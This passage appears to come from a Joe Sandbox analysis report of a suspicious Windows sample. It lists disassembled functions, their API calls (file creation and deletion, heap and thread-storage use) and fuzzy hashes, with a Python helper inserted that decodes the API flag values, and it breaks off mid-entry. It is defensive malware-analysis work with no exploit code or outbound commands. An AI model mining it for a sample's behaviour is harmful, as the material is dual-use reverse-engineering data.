                    • Associated: 0000001E.00000002.3238894702.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 0000001E.00000002.3239106452.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 0000001E.00000002.3239151888.0000000000419000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_30_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: CreateDirectorywcslenwcsncpy
                    • String ID:
                    • API String ID: 961886536-0
                    • Opcode ID: d6c445466f8a19e48a25e4a2068d10de2bbe29753fac2d082d2e760440aa5e2b
                    • Instruction ID: 2d24f661812d06aabf4acf2af4a599dd38efaf3f9e777f7594d650cf82d0c1de
                    • Opcode Fuzzy Hash: d6c445466f8a19e48a25e4a2068d10de2bbe29753fac2d082d2e760440aa5e2b
                    • Instruction Fuzzy Hash: 9A01DBB0401318D6CB65DB64CC89AFE7379DF04301F6046BBE815E25D1E7389AA4DB4A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    Nodes (id, address range, calls made in the block) and successor edges:
                      891 408dee-408e26 memset InitCommonControlsEx CoInitialize
                    APIs
                    • memset.MSVCRT ref: 00408DFB
                    • InitCommonControlsEx.COMCTL32(00000008,00001000), ref: 00408E15
                    • CoInitialize.OLE32(00000000), ref: 00408E1D
                    Memory Dump Source
                    • Source File: 0000001E.00000002.3238807984.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 0000001E.00000002.3238392053.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 0000001E.00000002.3238894702.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 0000001E.00000002.3239106452.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 0000001E.00000002.3239151888.0000000000419000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_30_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: CommonControlsInitInitializememset
                    • String ID:
                    • API String ID: 2179856907-0
                    • Opcode ID: d861f93e929e8b2be3fa0307ea6de5ff81dc4c61bc6e7fbf8c72a90690fa8d51
                    • Instruction ID: 955719fea0046c6293a44e32614ed026eb147d3324017d94785fb64326744d49
                    • Opcode Fuzzy Hash: d861f93e929e8b2be3fa0307ea6de5ff81dc4c61bc6e7fbf8c72a90690fa8d51
                    • Instruction Fuzzy Hash: FDE08CB088430CBBEB009BD0EC0EF8DBB7CEB00315F4041A4F904A2280EBB466488B95
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                      • Part of subcall function 0040DB18: EnterCriticalSection.KERNEL32(00000020,00000000,?,00000000,0040B455,00000000,?,?,00000000,00403350,00000000,00000000,00000000,00000000,?,00000000), ref: 0040DB23
                      • Part of subcall function 0040DB18: LeaveCriticalSection.KERNEL32(00000020,?,00000000,0040B455,00000000,?,?,00000000,00403350,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0040DB9E
                    • CreateFileW.KERNELBASE(00000000,80000000,00000000,00000000,00000003,00000080,00000000,?,00000000,?,?,00000000,00403350,00000000,00000000,00000000), ref: 0040B473
                    • HeapAlloc.KERNEL32(00000000,00001000,?,00000000,?,?,00000000,00403350,00000000,00000000,00000000,00000000,?,00000000,00000000,00000800), ref: 0040B495
                    Memory Dump Source
                    • Source File: 0000001E.00000002.3238807984.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 0000001E.00000002.3238392053.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 0000001E.00000002.3238894702.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 0000001E.00000002.3239106452.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 0000001E.00000002.3239151888.0000000000419000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_30_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: CriticalSection$AllocCreateEnterFileHeapLeave
                    • String ID:
                    • API String ID: 3705299215-0
                    • Opcode ID: 770ca6dcf0c78f014627849ec7c08e1bba775e026bf20b1c3eb2924782468709
                    • Instruction ID: 11d32f41a61cd8df30a66e4113f3bfff31ba723ad3a0b0249673477e2beeffa2
                    • Opcode Fuzzy Hash: 770ca6dcf0c78f014627849ec7c08e1bba775e026bf20b1c3eb2924782468709
                    • Instruction Fuzzy Hash: 62119371200304ABC2305F1ADC44B57BBF8EBC5764F14823EF565A37E1C77599158BA8
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                      • Part of subcall function 0040E3B9: HeapFree.KERNEL32(00000000,-00000018,00000200,00000000,0040E277,00000200,?,?,?,0040112D,0000000C,000186A1,00000007,00417074,004180F0,00000004), ref: 0040E3FA
                    • RtlAllocateHeap.NTDLL(00000000,FFFFFFDD,?,00000200,?,?,?,0040112D,0000000C,000186A1,00000007,00417074,004180F0,00000004,00000000,00417064), ref: 0040E296
                    • memset.MSVCRT ref: 0040E2D1
                    Memory Dump Source
                    • Source File: 0000001E.00000002.3238807984.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 0000001E.00000002.3238392053.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 0000001E.00000002.3238894702.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 0000001E.00000002.3239106452.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 0000001E.00000002.3239151888.0000000000419000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_30_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: Heap$AllocateFreememset
                    • String ID:
                    • API String ID: 2774703448-0
                    • Opcode ID: e4601c40af4f90fd6d7b6dc76b08f4e14a7cbeae79d3d170558c75ed44b030ef
                    • Instruction ID: 6d5d9c53e9755405ffb3e8ab18b4b48e318f9db4ecaa07005482283559b0ef73
                    • Opcode Fuzzy Hash: e4601c40af4f90fd6d7b6dc76b08f4e14a7cbeae79d3d170558c75ed44b030ef
                    • Instruction Fuzzy Hash: 5D117F72504314ABC320DF0AD944A4BBBE8EF88710F01492EF988A7351D774ED108BA5
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • HeapFree.KERNEL32(00000000,?,00000000,00000000,?,?,00403394,00000000,00000000,00000800,00000000,00000000,00000000,00000000,?,00000000), ref: 0040B093
                    • FindCloseChangeNotification.KERNELBASE(00000000,00000000,?,?,00403394,00000000,00000000,00000800,00000000,00000000,00000000,00000000,?,00000000,00000000,00000800), ref: 0040B09B
                    Memory Dump Source
                    • Source File: 0000001E.00000002.3238807984.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 0000001E.00000002.3238392053.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 0000001E.00000002.3238894702.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 0000001E.00000002.3239106452.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 0000001E.00000002.3239151888.0000000000419000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_30_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: ChangeCloseFindFreeHeapNotification
                    • String ID:
                    • API String ID: 1642550653-0
                    • Opcode ID: bcdd82019f876fc489b22f42e5959096ccfe265fa7cf8be21467e7666472b7d6
                    • Instruction ID: 7abf06afc9ef833db34d05f69b67e4dbbe1385027aa9b24abf0250c41048a97e
                    • Opcode Fuzzy Hash: bcdd82019f876fc489b22f42e5959096ccfe265fa7cf8be21467e7666472b7d6
                    • Instruction Fuzzy Hash: 1AF08C32505110ABC6322B6AEC09E8BBA72EF81724F148A3FF125314F4CB794850DF9C
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • wcslen.MSVCRT ref: 0040E78E
                    • RtlAllocateHeap.NTDLL(020A0000,00000000,?,?,00000000,00000000), ref: 0040E7A9
                    Memory Dump Source
                    • Source File: 0000001E.00000002.3238807984.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 0000001E.00000002.3238392053.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 0000001E.00000002.3238894702.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 0000001E.00000002.3239106452.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 0000001E.00000002.3239151888.0000000000419000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_30_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: AllocateHeapwcslen
                    • String ID:
                    • API String ID: 1345907364-0
                    • Opcode ID: 72c8991afff95364d9171c38dd98e6fe33221a3a1fadc299bdc7e95de95877d4
                    • Instruction ID: d40e0309548f3d2a4a525bb3e3ae8e28906eb34af4bb1b46d5d9fd1a2a98838f
                    • Opcode Fuzzy Hash: 72c8991afff95364d9171c38dd98e6fe33221a3a1fadc299bdc7e95de95877d4
                    • Instruction Fuzzy Hash: 83F05EB5600208FFCB04DFA5D880E9A77B9EB88718F10C46DF9088B390D635EA01CF94
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • SetFileAttributesW.KERNEL32(00000002,00000080,0040AE72,020A9F70,00000000,00401FF0,00000000,-0000012C,00402366,00000000,?,00000000,00000001,00000000,00000000,00000000), ref: 0040AE50
                    • DeleteFileW.KERNELBASE(00000000,0040AE72,020A9F70,00000000,00401FF0,00000000,-0000012C,00402366,00000000,?,00000000,00000001,00000000,00000000,00000000,00000002), ref: 0040AE5A
                    Memory Dump Source
                    • Source File: 0000001E.00000002.3238807984.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 0000001E.00000002.3238392053.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 0000001E.00000002.3238894702.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 0000001E.00000002.3239106452.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 0000001E.00000002.3239151888.0000000000419000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_30_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: File$AttributesDelete
                    • String ID:
                    • API String ID: 2910425767-0
                    • Opcode ID: 856d1dee773f9fe4b81d39230ef639874c988cfb4423ff7bdc63b5e612766022
                    • Instruction ID: 9bbbf45483326d305172a49cd8f3e34a401707f8027ad8c24340846d3084d85d
                    • Opcode Fuzzy Hash: 856d1dee773f9fe4b81d39230ef639874c988cfb4423ff7bdc63b5e612766022
                    • Instruction Fuzzy Hash: 36D09E30488300BBD7555B20DD0D75B7EA16F90745F08CC79B585610F1C7788C64EB4A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • HeapCreate.KERNELBASE(00000000,00001000,00000000,?,00401053,00000000,00001000,00000000,00000000), ref: 0040E4DC
                    • TlsAlloc.KERNEL32(?,00401053,00000000,00001000,00000000,00000000), ref: 0040E4E7
                      • Part of subcall function 0040ED40: HeapAlloc.KERNEL32(020A0000,00000000,0000000C,?,?,0040E4F7,?,00401053,00000000,00001000,00000000,00000000), ref: 0040ED4E
                      • Part of subcall function 0040ED40: HeapAlloc.KERNEL32(020A0000,00000000,00000010,?,?,0040E4F7,?,00401053,00000000,00001000,00000000,00000000), ref: 0040ED62
                      • Part of subcall function 0040ED40: TlsSetValue.KERNEL32(0000000D,00000000,?,?,0040E4F7,?,00401053,00000000,00001000,00000000,00000000), ref: 0040ED8B
                    Memory Dump Source
                    • Source File: 0000001E.00000002.3238807984.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 0000001E.00000002.3238392053.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 0000001E.00000002.3238894702.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 0000001E.00000002.3239106452.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 0000001E.00000002.3239151888.0000000000419000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_30_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: AllocHeap$CreateValue
                    • String ID:
                    • API String ID: 493873155-0
                    • Opcode ID: db5b467741c0f00c93d1fd6ff26af59c18c3d1bccb059c91a176208ebbe690b4
                    • Instruction ID: 280f0189a1b64710240dfbe11500258ab370f1237584088fdcd0bc4150eb2939
                    • Opcode Fuzzy Hash: db5b467741c0f00c93d1fd6ff26af59c18c3d1bccb059c91a176208ebbe690b4
                    • Instruction Fuzzy Hash: F1D012705C83046BE7002BB2BC4A7843A78DB04751F20843AFA095B3D0DAB45480895D
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00000000,00403F00,00000001,00000002,00000000,00000000,00000000), ref: 0040A412
                    • MultiByteToWideChar.KERNEL32(00000001,00000000,00000000,00000000,00000000,00000001,00000000,00000000,?,?,?,00000000,00403F00,00000001,00000002,00000000), ref: 0040A432
                    Memory Dump Source
                    • Source File: 0000001E.00000002.3238807984.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 0000001E.00000002.3238392053.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 0000001E.00000002.3238894702.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 0000001E.00000002.3239106452.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 0000001E.00000002.3239151888.0000000000419000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_30_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: ByteCharMultiWide
                    • String ID:
                    • API String ID: 626452242-0
                    • Opcode ID: a30fc8ce1e8d09fb33b6fb0615b8e378ebe935ed8b67f93c539b2d5397848702
                    • Instruction ID: fedc1c205319a766e10bd101b7b911e6f787ac623343fea3eb012fc010ddeeec
                    • Opcode Fuzzy Hash: a30fc8ce1e8d09fb33b6fb0615b8e378ebe935ed8b67f93c539b2d5397848702
                    • Instruction Fuzzy Hash: 0A3164361083056EC7349E799C80B7BB799EF80324F144B3FFEA1262C1D6789821976A
                    Uniqueness

                    Uniqueness Score: -1.00%
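                    The "APIs" lines in this listing give each call's stack slots as raw hex, so the access mask of the CreateFileW call at 0040B473, the dwFlags of LoadLibraryExW at 00401BDE (0x2, LOAD_LIBRARY_AS_DATAFILE), the attribute reset before DeleteFileW at 0040AE50/0040AE5A and the code pages passed to MultiByteToWideChar at 0040A412/0040A432 are easier to read once decoded. The Python below is an added triage helper for that purpose; it is not part of the Joe Sandbox report or its tooling. The SAMPLE lines are copied from the listing above with some trailing stack slots trimmed, the constant tables are standard Win32 values, and treating slots beyond a call's documented parameter count as caller frame data rather than arguments is an assumption.

```python
"""Decode the 'APIs' lines of a Joe Sandbox function listing into named Win32 flags.

Added reading aid for the report above, not Joe Sandbox code. SAMPLE holds lines
copied from the listing; the constant tables are standard Win32 values. Only the
parameter positions named in FLAGS are interpreted (assumption: slots past the
documented prototype are caller frame data printed by the sandbox, not arguments).
"""
import functools
import operator
import re
from dataclasses import dataclass, field
from typing import Optional

# Constructed input: lines from the listing above, some with trailing slots trimmed.
SAMPLE = """\
  • Part of subcall function 0040DB18: EnterCriticalSection.KERNEL32(00000020,00000000,?), ref: 0040DB23
• CreateFileW.KERNELBASE(00000000,80000000,00000000,00000000,00000003,00000080,00000000,?), ref: 0040B473
• LoadLibraryExW.KERNEL32(00000000,00000000,00000002,00000000,?,?,0040119C), ref: 00401BDE
• SetFileAttributesW.KERNEL32(00000002,00000080,0040AE72,020A9F70), ref: 0040AE50
• DeleteFileW.KERNELBASE(00000000,0040AE72,020A9F70,00000000,-0000012C), ref: 0040AE5A
• MultiByteToWideChar.KERNEL32(00000001,00000000,00000000,00000000,00000000,00000001), ref: 0040A432
• memset.MSVCRT ref: 00408DFB
"""

LINE = re.compile(
    r"^\s*•?\s*(?:Part of subcall function (?P<parent>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)

# (parameter index, parameter name, value table, True if the value is a bitmask)
FLAGS = {
    "CreateFileW": [
        (1, "dwDesiredAccess", {0x80000000: "GENERIC_READ", 0x40000000: "GENERIC_WRITE"}, True),
        (2, "dwShareMode", {0x1: "FILE_SHARE_READ", 0x2: "FILE_SHARE_WRITE", 0x4: "FILE_SHARE_DELETE"}, True),
        (4, "dwCreationDisposition", {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING",
                                      4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}, False),
        (5, "dwFlagsAndAttributes", {0x1: "FILE_ATTRIBUTE_READONLY", 0x2: "FILE_ATTRIBUTE_HIDDEN",
                                     0x80: "FILE_ATTRIBUTE_NORMAL", 0x4000000: "FILE_FLAG_DELETE_ON_CLOSE"}, True),
    ],
    "LoadLibraryExW": [
        (2, "dwFlags", {0x1: "DONT_RESOLVE_DLL_REFERENCES", 0x2: "LOAD_LIBRARY_AS_DATAFILE",
                        0x8: "LOAD_WITH_ALTERED_SEARCH_PATH"}, True),
    ],
    "SetFileAttributesW": [
        (1, "dwFileAttributes", {0x1: "FILE_ATTRIBUTE_READONLY", 0x2: "FILE_ATTRIBUTE_HIDDEN",
                                 0x4: "FILE_ATTRIBUTE_SYSTEM", 0x80: "FILE_ATTRIBUTE_NORMAL"}, True),
    ],
    "MultiByteToWideChar": [
        (0, "CodePage", {0: "CP_ACP", 1: "CP_OEMCP", 65001: "CP_UTF8"}, False),
    ],
}


@dataclass
class Call:
    api: str
    module: str
    args: list                    # one entry per printed slot; None where the listing shows '?'
    ref: str                      # address of the call instruction
    parent: Optional[str] = None  # set for 'Part of subcall function' lines
    decoded: dict = field(default_factory=dict)


def parse_arg(slot: str) -> Optional[int]:
    slot = slot.strip()
    return None if slot == "?" else int(slot, 16)   # handles '-0000012C' as a signed value


def describe(value: Optional[int], table: dict, bitmask: bool) -> str:
    if value is None:
        return "?"
    if not bitmask:
        return table.get(value, f"0x{value & 0xFFFFFFFF:X}")
    if value == 0:
        return "0"
    names = [name for bit, name in table.items() if value & bit]
    rest = value & ~functools.reduce(operator.or_, table, 0) & 0xFFFFFFFF
    if rest:
        names.append(f"0x{rest:X}")   # bits the table does not know
    return "|".join(names)


def decode(call: Call) -> dict:
    out = {}
    for index, name, table, bitmask in FLAGS.get(call.api, []):
        if index < len(call.args):
            out[name] = describe(call.args[index], table, bitmask)
    return out


def parse_trace(text: str) -> list:
    calls = []
    for line in text.splitlines():
        m = LINE.match(line)
        if not m:                      # headers such as 'APIs', blank lines
            continue
        raw = m.group("args")
        args = [parse_arg(a) for a in raw.split(",")] if raw else []
        call = Call(m["api"], m["module"], args, m["ref"], m["parent"])
        call.decoded = decode(call)
        calls.append(call)
    return calls


def describe_call(call: Call) -> str:
    flags = " ".join(f"{k}={v}" for k, v in call.decoded.items())
    origin = f" [inside subcall {call.parent}]" if call.parent else ""
    return f"{call.ref} {call.api} ({call.module}) {flags}{origin}".rstrip()


if __name__ == "__main__":
    for c in parse_trace(SAMPLE):
        print(describe_call(c))
```

                    Run as a script it prints one decoded line per call; any "APIs" block of this report can be passed to parse_trace the same way. The tables cover only the calls named in the lead-in; other APIs are parsed but left undecoded until FLAGS gains a (position, name, table, bitmask) entry for them.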

                    APIs
                      • Part of subcall function 0040E660: TlsGetValue.KERNEL32(0000000D,?,00402EF9,00000000,00000000,00000000,00000000,?,0040118D,00000000,00000000,00000000,00000001,00000004,00000000,00417064), ref: 0040E677
                      • Part of subcall function 0040A220: RtlAllocateHeap.NTDLL(00000008,00000000,00402EAC,00000200,00000000,0000000A,00000000,00000000,00000000,00000000,00000000,00000000,004044FA,00000000,00000000,00000000), ref: 0040A231
                    • GetShortPathNameW.KERNEL32(020A9F70,020A9F70,00002710), ref: 00402BE0
                      • Part of subcall function 0040E520: GetLastError.KERNEL32(00001000,00000000,00000000), ref: 0040E526
                      • Part of subcall function 0040E520: TlsGetValue.KERNEL32(0000000D), ref: 0040E535
                      • Part of subcall function 0040E520: SetLastError.KERNEL32(?), ref: 0040E54B
                      • Part of subcall function 0040E560: TlsGetValue.KERNEL32(0000000D,00000000,00000000), ref: 0040E56C
                      • Part of subcall function 0040E560: RtlAllocateHeap.NTDLL(020A0000,00000000,?), ref: 0040E599
                      • Part of subcall function 0040A200: HeapFree.KERNEL32(00000000,00000000,00401B7C,00000000,00000000,?,00000000,00000000,00417024,00000000,00000000,?,00000000,?,00000000,00000000), ref: 0040A20C
                      • Part of subcall function 0040E6C0: wcslen.MSVCRT ref: 0040E6D7
                      • Part of subcall function 00405170: TlsGetValue.KERNEL32(?,?,00402F99,00000000,00000008,00000001,00000000,00000000,00000000,00000000,00000000,?,00000200,00000000,00000000,00000000), ref: 00405178
                      • Part of subcall function 0040E5F0: RtlFreeHeap.NTDLL(020A0000,00000000,00000000,?,00000000,?,00412484,00000000,00000000,-00000008), ref: 0040E608
                    Memory Dump Source
                    • Source File: 0000001E.00000002.3238807984.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 0000001E.00000002.3238392053.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 0000001E.00000002.3238894702.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 0000001E.00000002.3239106452.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 0000001E.00000002.3239151888.0000000000419000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_30_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: HeapValue$AllocateErrorFreeLast$NamePathShortwcslen
                    • String ID:
                    • API String ID: 192546213-0
                    • Opcode ID: 4ffc8271a727788d72dbd82b9e7b130440edac90e55bf10bd88016aa18fcca3f
                    • Instruction ID: cfcced4fe20ace1cb9c77e507b1d6c1eac9b345b0de8df7ff04b6d7fabcc8d03
                    • Opcode Fuzzy Hash: 4ffc8271a727788d72dbd82b9e7b130440edac90e55bf10bd88016aa18fcca3f
                    • Instruction Fuzzy Hash: ED012975108205BAE501BB72DD06D3F7669EF80718F108C3EB444B50E2EA3D9C616A2E
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • WriteFile.KERNELBASE(00000000,?,?,00000000,00000000,00000000,?,0040B088,00000000,00000000,?,?,00403394,00000000,00000000,00000800), ref: 0040B0E7
                    Memory Dump Source
                    • Source File: 0000001E.00000002.3238807984.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                     • Associated: 0000001E.00000002.3238392053.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 0000001E.00000002.3238894702.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 0000001E.00000002.3239106452.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                     • Associated: 0000001E.00000002.3239151888.0000000000419000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_30_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: FileWrite
                    • String ID:
                    • API String ID: 3934441357-0
                    • Opcode ID: c522352010aa0ffdeb1c8550a8e7d9d94415fd1ef62632f4db173a1ec829df8d
                    • Instruction ID: 9ab85608ef899c62796374e569d53c100cb89dcb0d5a9370bd5502097d7715ab
                    • Opcode Fuzzy Hash: c522352010aa0ffdeb1c8550a8e7d9d94415fd1ef62632f4db173a1ec829df8d
                    • Instruction Fuzzy Hash: F4F0F276104601AFD320CF58D808B87FBE8EB48321F00C82EE59AC2A50C730E810DB55
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • GetNativeSystemInfo.KERNEL32(00000000,?,00000000,00000000), ref: 00402B89
                    Memory Dump Source
                    • Source File: 0000001E.00000002.3238807984.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                     • Associated: 0000001E.00000002.3238392053.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 0000001E.00000002.3238894702.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 0000001E.00000002.3239106452.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                     • Associated: 0000001E.00000002.3239151888.0000000000419000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_30_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: InfoNativeSystem
                    • String ID:
                    • API String ID: 1721193555-0
                    • Opcode ID: 700b71109f0c023e3e1c18d21fddf158996dc8241789cbbab02419d6e0a745b1
                    • Instruction ID: 9093739e4f63ff22c3e940b982bbbee8e150dd58fd9266ea6ee1473296d97692
                    • Opcode Fuzzy Hash: 700b71109f0c023e3e1c18d21fddf158996dc8241789cbbab02419d6e0a745b1
                    • Instruction Fuzzy Hash: EBD0C26041810846D710BE658509B9B73E8D700304F608C3AE084961C1F3FCE9D5821B
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • RtlFreeHeap.NTDLL(020A0000,00000000,00000000,?,00000000,?,00412484,00000000,00000000,-00000008), ref: 0040E608
                    Memory Dump Source
                    • Source File: 0000001E.00000002.3238807984.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                     • Associated: 0000001E.00000002.3238392053.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 0000001E.00000002.3238894702.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 0000001E.00000002.3239106452.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                     • Associated: 0000001E.00000002.3239151888.0000000000419000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_30_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: FreeHeap
                    • String ID:
                    • API String ID: 3298025750-0
                    • Opcode ID: 4a1186e03504991e415e8e092ef0052a0ef4c47318b2f6512a59703c6ea9925b
                    • Instruction ID: cd5ef850ad68aae2c27baef3402967596087f0f1f33355341870062cdd1dbcb2
                    • Opcode Fuzzy Hash: 4a1186e03504991e415e8e092ef0052a0ef4c47318b2f6512a59703c6ea9925b
                    • Instruction Fuzzy Hash: 4ED0C9B2144218BFE614DB96FC58FF7776CE794750F50C82AFA048A1D0CA769890CBA8
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • RtlAllocateHeap.NTDLL(00000008,00000000,00402EAC,00000200,00000000,0000000A,00000000,00000000,00000000,00000000,00000000,00000000,004044FA,00000000,00000000,00000000), ref: 0040A231
                    Memory Dump Source
                    • Source File: 0000001E.00000002.3238807984.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                     • Associated: 0000001E.00000002.3238392053.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 0000001E.00000002.3238894702.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 0000001E.00000002.3239106452.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                     • Associated: 0000001E.00000002.3239151888.0000000000419000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_30_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: AllocateHeap
                    • String ID:
                    • API String ID: 1279760036-0
                    • Opcode ID: c9295373328ff73b20fc6ca55934024a7e081ff9ecf7500422664bd763381941
                    • Instruction ID: b6192ce9428b1ba2f4eef992fd110c0ccadf60e3b61bfdacf1c665f796a5839f
                    • Opcode Fuzzy Hash: c9295373328ff73b20fc6ca55934024a7e081ff9ecf7500422664bd763381941
                    • Instruction Fuzzy Hash: 97C04C713442006AE6509B24DE09F5776A9BB70742F00C43A7545D11B4DA31D860D72D
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • HeapCreate.KERNELBASE(00000000,00001000,00000000,0040106C,00000000,00001000,00000000,00000000), ref: 0040A1C9
                    Memory Dump Source
                    • Source File: 0000001E.00000002.3238807984.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                     • Associated: 0000001E.00000002.3238392053.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 0000001E.00000002.3238894702.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 0000001E.00000002.3239106452.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                     • Associated: 0000001E.00000002.3239151888.0000000000419000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_30_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: CreateHeap
                    • String ID:
                    • API String ID: 10892065-0
                    • Opcode ID: 632f7ef1fd3851381c9f94796d2a32ace23046017034c32eb606c36269a48e04
